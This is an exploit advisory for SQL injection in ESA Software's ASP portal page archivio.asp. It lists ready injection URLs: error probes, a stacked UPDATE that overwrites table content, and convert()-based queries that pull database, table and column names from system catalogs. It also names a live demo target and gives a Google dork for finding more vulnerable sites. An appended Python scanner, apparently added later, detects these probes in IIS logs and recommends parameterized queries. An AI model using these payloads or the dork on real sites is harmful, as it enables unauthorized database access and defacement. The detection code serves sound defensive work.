ESA Software S.p.A. ASP/Portal www/archivio.asp SQL injection
Credit : CodeXpLoder'tq
Mail : codexploder[at]hotmail[dot]com
Site : codexploder.biyosecurity.net,biyofrm.com
Source : http://www.esasoftware.com
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Thanks : Liz0ziM,eno7,sao,Crackers_child,erne,The_bekir,Di_lejyoner,3APA3A
Zeberus,Hacker_Onur,DesquneR,rapstarmurat,Uyussman
and
all BiyoSecurity members
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
1-) example.com/[path]/archivio.asp?ID=(sql method)
1-) example.com/www/archivio.asp?ID=(sql method)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2-) example.com/[path]/archivio.asp?ID=(sql method)
2-) example.com/www/archivio.asp?ID=(sql method)
2-) example.com/www/archivio.asp?ID=1'
2-) example.com/www/archivio.asp?ID=1 having 1=1
2-) example.com/www/archivio.asp?ID=1,2,3,4,5
2-) example.com/www/archivio.asp?ID=1,2,3,4,5+update+tbl+set+column='your text or meta code';--
2-) example.com/events/archivio.asp?ID=1 group by tbl.column having 1=1
#for db : convert(int, db_name(1))
        : convert(int, db_name(2))
#for other tbl : convert(int, (select top 1 name from sysobjects where xtype='U' and name>'TABLE'))
#for other column : convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))
#tbl : sezioni
#column : sezione
##########################################################
demo site: http://www.mondoesa-milano.com/www/archivio.asp?ID=5
google search code : inurl:"www/archivio.asp"
demo site table list : http://codexploder.biyosecurity.net/alltabllo.JPG
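
Detection side, as an added example (not part of the original advisory and not ESA Software code): a scan of IIS W3C logs for archivio.asp requests whose ID parameter is not a plain integer, labelled with the markers used in the test strings above. The log lines, field layout and client addresses are constructed sample data.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt (sample data, not from a real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-10 09:14:02 198.51.100.7 GET /www/archivio.asp ID=5 200
2024-01-10 09:14:09 203.0.113.20 GET /www/archivio.asp ID=1' 500
2024-01-10 09:14:15 203.0.113.20 GET /www/archivio.asp ID=1+having+1=1 500
2024-01-10 09:14:31 203.0.113.20 GET /www/archivio.asp ID=convert(int,db_name(1)) 500
2024-01-10 09:15:00 198.51.100.7 GET /www/default.asp - 200
2024-01-10 09:15:12 198.51.100.9 GET /events/archivio.asp id=12 200
"""

# Markers that appear in the advisory's test strings.
MARKERS = {
    "quote": re.compile(r"'"),
    "having/group by": re.compile(r"\b(having|group\s+by)\b", re.I),
    "convert() error probe": re.compile(r"\bconvert\s*\(", re.I),
    "system catalog": re.compile(r"\b(sysobjects|syscolumns|db_name)\b", re.I),
    "stacked update": re.compile(r"\bupdate\b", re.I),
}

def scan(log_text):
    """Return one finding per archivio.asp request whose ID is not an integer."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for following rows
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith("/archivio.asp"):
            continue
        params = parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True)
        for name, values in params.items():
            if name.lower() != "id":
                continue
            for value in values:           # parse_qs has already URL-decoded it
                if re.fullmatch(r"[0-9]+", value):
                    continue               # the only shape a legitimate ID has
                hits = [lbl for lbl, rx in MARKERS.items() if rx.search(value)]
                findings.append({"time": f"{row.get('date', '')} {row.get('time', '')}",
                                 "client": row.get("c-ip", ""), "id": value,
                                 "markers": hits or ["non-integer ID"]})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["client"], repr(f["id"]), ", ".join(f["markers"]))
```

The same integer-only rule is the fix on the server side: reject any ID that is not all digits before it reaches the query, and bind it as a parameter instead of concatenating it into the SQL string.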